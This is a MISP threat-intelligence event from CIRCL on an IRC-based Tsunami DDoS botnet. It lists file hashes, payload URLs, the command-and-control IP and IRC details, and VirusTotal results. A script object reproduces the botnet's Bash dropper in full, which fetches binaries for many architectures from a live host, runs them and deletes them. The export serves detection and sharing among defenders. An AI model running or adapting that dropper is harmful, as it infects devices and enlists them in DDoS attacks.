2023-04-21 13:25:09 +00:00
{
"Event" : {
"analysis" : "2" ,
"date" : "2019-04-27" ,
"extends_uuid" : "" ,
"info" : "OSINT - Analysis of an IRC based Botnet" ,
"publish_timestamp" : "1556355887" ,
"published" : true ,
"threat_level_id" : "3" ,
"timestamp" : "1556355866" ,
"uuid" : "5cc410a0-be10-4990-acf6-44cc02de0b81" ,
"Orgc" : {
"name" : "CIRCL" ,
"uuid" : "55f6ea5e-2c60-40e5-964f-47a8950d210f"
} ,
"Tag" : [
{
"colour" : "#004646" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "type:OSINT" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0071c3" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "osint:lifetime=\"perpetual\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0087e8" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "osint:certainty=\"50\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#ffffff" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "tlp:white" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:malpedia=\"Tsunami\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#5ed600" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "ddos:type=\"flooding-attack\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#00bdbd" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "ecsirt:availability=\"ddos\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556353198" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc410ae-1374-4513-b215-479e02de0b81" ,
"value" : "49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-5500-4efe-a798-492b02de0b81" ,
"value" : "http://185.244.25.235/mips"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-bff0-47d9-aadc-4c0e02de0b81" ,
"value" : "http://185.244.25.235/mipsel"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-c50c-43dd-905d-4e5f02de0b81" ,
"value" : "http://185.244.25.235/sh4"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-d280-413b-9c00-492c02de0b81" ,
"value" : "http://185.244.25.235/x86"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-5b24-41a5-97b7-4c6802de0b81" ,
"value" : "http://185.244.25.235/armv7l"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-15ec-4cc3-a885-44c702de0b81" ,
"value" : "http://185.244.25.235/armv6l"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-f0bc-4279-a64b-478a02de0b81" ,
"value" : "http://185.244.25.235/i686"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-023c-4b02-ae81-43bf02de0b81" ,
"value" : "http://185.244.25.235/powerpc"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-9a80-4f29-af94-4ccd02de0b81" ,
"value" : "http://185.244.25.235/i586"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-ef0c-426c-9b7c-4e3802de0b81" ,
"value" : "http://185.244.25.235/m68k"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-1d2c-4f08-861f-4a8802de0b81" ,
"value" : "http://185.244.25.235/sparc"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-a5f4-4644-8938-448102de0b81" ,
"value" : "http://185.244.25.235/armv4l"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-ecc4-4beb-b4f1-4f8902de0b81" ,
"value" : "http://185.244.25.235/armv5l"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556354973" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "5cc4179d-4048-4450-913a-415a02de0b81" ,
"value" : "http://185.244.25.235/440fp"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-cc64-4ea0-ac90-41a702de0b81" ,
"value" : "31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-b52c-4fc2-9cc7-4b2502de0b81" ,
"value" : "fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-2b74-4df3-9d09-4d0d02de0b81" ,
"value" : "284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-7878-4dcf-a69c-474802de0b81" ,
"value" : "32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-7f90-42a3-8865-4b6e02de0b81" ,
"value" : "976e948ccec98ffd36115d0240c2a438dccd4e15d220284e6356e3fcb0f2548c"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-dbd0-464c-b6de-462202de0b81" ,
"value" : "f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-235c-49fe-8303-4a8e02de0b81" ,
"value" : "3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-58f0-4fff-810e-472d02de0b81" ,
"value" : "34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-a4c8-4691-8b09-443902de0b81" ,
"value" : "3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "5cc41804-31dc-4d16-b61e-4b6502de0b81" ,
"value" : "62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d"
} ,
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1556355783" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "5cc41ac7-0aa4-4bff-8f34-4bd402de0b81" ,
"value" : "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet"
}
] ,
"Object" : [
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556354542" ,
"uuid" : "332718dd-e3ba-40b1-bb59-06318357f8e2" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "332718dd-e3ba-40b1-bb59-06318357f8e2" ,
"referenced_uuid" : "ec7ab03e-c8dd-4dd2-886e-cf39dada576c" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556353212" ,
"uuid" : "5cc410bc-73a0-4933-8799-4e0c02de0b81"
} ,
{
"comment" : "" ,
"object_uuid" : "332718dd-e3ba-40b1-bb59-06318357f8e2" ,
"referenced_uuid" : "5cc410e3-9a44-4c3a-abb2-498602de0b81" ,
"relationship_type" : "connects-to" ,
"timestamp" : "1556353280" ,
"uuid" : "5cc41100-81b4-4504-9ec5-4ce202de0b81"
} ,
{
"comment" : "" ,
"object_uuid" : "332718dd-e3ba-40b1-bb59-06318357f8e2" ,
"referenced_uuid" : "5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81" ,
"relationship_type" : "connects-to" ,
"timestamp" : "1556354542" ,
"uuid" : "5cc415ee-fba8-4915-89b9-4d6202de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556353198" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "353bb33b-de63-4356-ba84-d6046e4279db" ,
"value" : "82062b666f09fc5c0fe4f68d1ea90916"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556353198" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "a928df56-4559-47ab-83d6-f5f7a7cbec25" ,
"value" : "b35d4b7980d361874e84e76eddbaff83c2c5790f"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556353198" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "133120eb-20ec-401c-9c89-47272373bb05" ,
"value" : "49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556353212" ,
"uuid" : "ec7ab03e-c8dd-4dd2-886e-cf39dada576c" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556353198" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "4bef3161-25cf-4364-bcef-432bc49c6834" ,
"value" : "2018-12-21T07:40:44"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556353198" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "73e29dd1-c3dd-40bd-91e1-660a20460fe9" ,
"value" : "https://www.virustotal.com/file/49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0/analysis/1545378044/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556353198" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "cbd0000d-8368-430e-85e0-7c2cd4871b09" ,
"value" : "26/57"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "An IP address (or domain or hostname) and a port seen as a tuple (or as a triple) in a specific time frame." ,
"meta-category" : "network" ,
"name" : "ip-port" ,
"template_uuid" : "9f8cea74-16fe-4968-a2b4-026676949ac6" ,
"template_version" : "7" ,
"timestamp" : "1556353315" ,
"uuid" : "5cc410e3-9a44-4c3a-abb2-498602de0b81" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "5cc410e3-9a44-4c3a-abb2-498602de0b81" ,
"referenced_uuid" : "5cc410ae-1374-4513-b215-479e02de0b81" ,
"relationship_type" : "connected-from" ,
"timestamp" : "1556353315" ,
"uuid" : "5cc41123-6a44-4259-96bf-497602de0b81"
}
] ,
"Attribute" : [
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ip" ,
"timestamp" : "1556353251" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "5cc410e3-d92c-4425-a0ab-49f202de0b81" ,
"value" : "185.244.25.235"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "dst-port" ,
"timestamp" : "1556353251" ,
"to_ids" : false ,
"type" : "port" ,
"uuid" : "5cc410e3-28e0-44f4-ab38-44da02de0b81" ,
"value" : "80"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "An IRC object to describe an IRC server and the associated channels." ,
"meta-category" : "network" ,
"name" : "irc" ,
"template_uuid" : "4bbbc004-c344-4b20-8672-b41102177fc7" ,
"template_version" : "2" ,
"timestamp" : "1556355330" ,
"uuid" : "5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "nickname" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc4152c-470c-4c48-b864-48d302de0b81" ,
"value" : "AmpAttacks"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ip" ,
"timestamp" : "1556355330" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "5cc4152c-86c0-4511-bc5f-450902de0b81" ,
"value" : "185.244.25.235"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "channel" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc4152c-bd1c-4174-94ba-4c7202de0b81" ,
"value" : "Summit"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "dst-port" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "port" ,
"uuid" : "5cc4152c-6de0-4f8b-8e6f-4d1d02de0b81" ,
"value" : "6667"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "nickname" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc41660-2350-47b7-8703-4df902de0b81" ,
"value" : "[x86_64|BWQLXKB]"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "nickname" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc41660-a6c4-4736-a284-4b7902de0b81" ,
"value" : "[MIPS|WGEQAV]"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "nickname" ,
"timestamp" : "1556355330" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc41660-b8d8-4c08-a98b-4c3002de0b81" ,
"value" : "[ARM4T|PCVREB]"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts." ,
"meta-category" : "misc" ,
"name" : "script" ,
"template_uuid" : "6bce7d01-dbec-4054-b3c2-3655a19382e2" ,
"template_version" : "3" ,
"timestamp" : "1556355040" ,
"uuid" : "5cc417e0-af4c-4df0-974b-4cd102de0b81" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "script" ,
"timestamp" : "1556355041" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc417e1-d624-429e-a881-407a02de0b81" ,
"value" : "#!/bin/bash\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mips; chmod +x mips; ./mips; rm -rf mips\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sh4; chmod +x sh4; ./sh4; rm -rf sh4\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/x86; chmod +x x86; ./x86; rm -rf x86\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i686; chmod +x i686; ./i686; rm -rf i686\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i586; chmod +x i586; ./i586; rm -rf i586\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/m68k; chmod +x m68k; ./m68k; rm -rf m68k\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sparc; chmod +x sparc; ./sparc; rm -rf sparc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/440fp; chmod +x 440fp; ./440fp; rm -rf 440fp"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "language" ,
"timestamp" : "1556355041" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc417e1-3a1c-422d-bd78-4e8102de0b81" ,
"value" : "Bash"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "filename" ,
"timestamp" : "1556355050" ,
"to_ids" : false ,
"type" : "filename" ,
"uuid" : "5cc417e1-3490-4743-8a5d-42ae02de0b81" ,
"value" : "sh"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "state" ,
"timestamp" : "1556355041" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5cc417e1-9198-4713-9aeb-4ee602de0b81" ,
"value" : "Malicious"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355092" ,
"uuid" : "6264284d-c9d5-4c12-8ba3-0f3c4ac9231a" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "6264284d-c9d5-4c12-8ba3-0f3c4ac9231a" ,
"referenced_uuid" : "c584310f-cfa6-4ca0-b283-88853eff679e" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355095" ,
"uuid" : "5cc41817-0044-43c2-9144-44f502de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "3c442568-e293-401d-a37c-0ab855c50bf8" ,
"value" : "1cc9232302cb7569dc6dcd76fe5d7c48"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "1a4460ab-f231-431f-9c40-8a14127a21db" ,
"value" : "3c24b5150afbcfc8b5b98740329e279c778acfec"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "42a36b99-1c82-482e-b298-8812fcfbea2d" ,
"value" : "284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355092" ,
"uuid" : "c584310f-cfa6-4ca0-b283-88853eff679e" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "c979bfbb-fa6b-435e-a994-2212c5b430ee" ,
"value" : "2019-04-07T05:10:51"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "4db99dd0-83ff-456e-9796-816f83b2c265" ,
"value" : "https://www.virustotal.com/file/284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a/analysis/1554613851/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "dcffe0ba-339e-4ab0-b00d-729db80d1bf5" ,
"value" : "35/55"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355093" ,
"uuid" : "a6383e65-36cc-4e3a-8d2e-439afdb5a58b" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "a6383e65-36cc-4e3a-8d2e-439afdb5a58b" ,
"referenced_uuid" : "dc71966f-e4cf-4026-a133-50090fd4b95b" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355095" ,
"uuid" : "5cc41817-5014-466a-a830-49fd02de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "4fd4815a-d6f1-4454-9d0b-740c1f4b120d" ,
"value" : "e49d17afc76617a6b2a445ef21342454"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "d72918eb-514b-4c72-8116-4420d1a08546" ,
"value" : "5d223085ca23494fd18622e6bc6d81b6f8eaa8a8"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "60614b70-e5de-484f-a5ce-1736fd2c69f3" ,
"value" : "3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "2" ,
"timestamp" : "1556355093" ,
"uuid" : "dc71966f-e4cf-4026-a133-50090fd4b95b" ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "last-submission" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "4c0b0672-508b-41f5-8ff0-6b13ee76b5c5" ,
"value" : "2019-04-14T04:40:19"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "permalink" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "1c60fb0a-aa1f-4dbc-a9ab-dc741863af4a" ,
"value" : "https://www.virustotal.com/file/3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc/analysis/1555216819/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1556355076" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "c5d88b4d-d908-4ecd-bcb1-bccf7e878a70" ,
"value" : "37/57"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "15" ,
"timestamp" : "1556355093" ,
"uuid" : "7c1420e2-b2c6-455a-ae2d-675b32ffa908" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "7c1420e2-b2c6-455a-ae2d-675b32ffa908" ,
"referenced_uuid" : "67696428-f0ea-4068-b00a-f669ee50ae03" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1556355096" ,
"uuid" : "5cc41818-142c-4b71-9410-445802de0b81"
}
] ,
"Attribute" : [
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "62e954a3-4db9-457b-9cd1-d2af06616d3c" ,
"value" : "30097dc12f07b9d44fd4bb32ea30cd4e"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "867e4b1e-b031-46ea-9753-8b1ec86a21ff" ,
"value" : "4f2350b20810ad45d40036c12d23239df1e3eaad"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1556355076" ,
"to_ids" : true ,
"type" : "sha256" ,
